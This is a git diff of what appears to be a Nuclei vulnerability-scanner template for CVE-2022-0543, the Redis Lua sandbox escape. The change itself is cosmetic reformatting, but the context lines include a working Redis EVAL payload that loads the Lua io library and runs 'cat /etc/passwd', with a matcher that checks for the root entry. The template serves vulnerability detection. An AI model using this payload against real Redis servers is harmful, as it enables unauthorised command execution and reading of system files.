diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index c7186b367f..bbbf90dddc 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -5,10 +5,7 @@ info: author: dwisiswant0 severity: critical description: | - This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The - vulnerability was introduced by Debian and Ubuntu Redis packages that - insufficiently sanitized the Lua environment. The maintainers failed to - disable the package interface, allowing attackers to load arbitrary libraries. + This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. reference: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis @@ -28,6 +25,7 @@ info: shodan-query: redis_version vendor: redis tags: cve,cve2022,network,redis,unauth,rce,kev + tcp: - host: - "{{Hostname}}" @@ -37,8 +35,9 @@ tcp: inputs: - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" read-size: 64 + matchers: - type: regex regex: - "root:.*:0:0:" -# digest: 4a0a00473045022027e375b83c9a6ee84e49c4a5f8ae2f56fc76db2d2acd7ec1b9a60bf45d7598de022100e7047e480c8a983cbe88770790661452320d96f1d4e18465298ff2403273a0f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027e375b83c9a6ee84e49c4a5f8ae2f56fc76db2d2acd7ec1b9a60bf45d7598de022100e7047e480c8a983cbe88770790661452320d96f1d4e18465298ff2403273a0f6:922c64590222798bb761d5b6d8e72950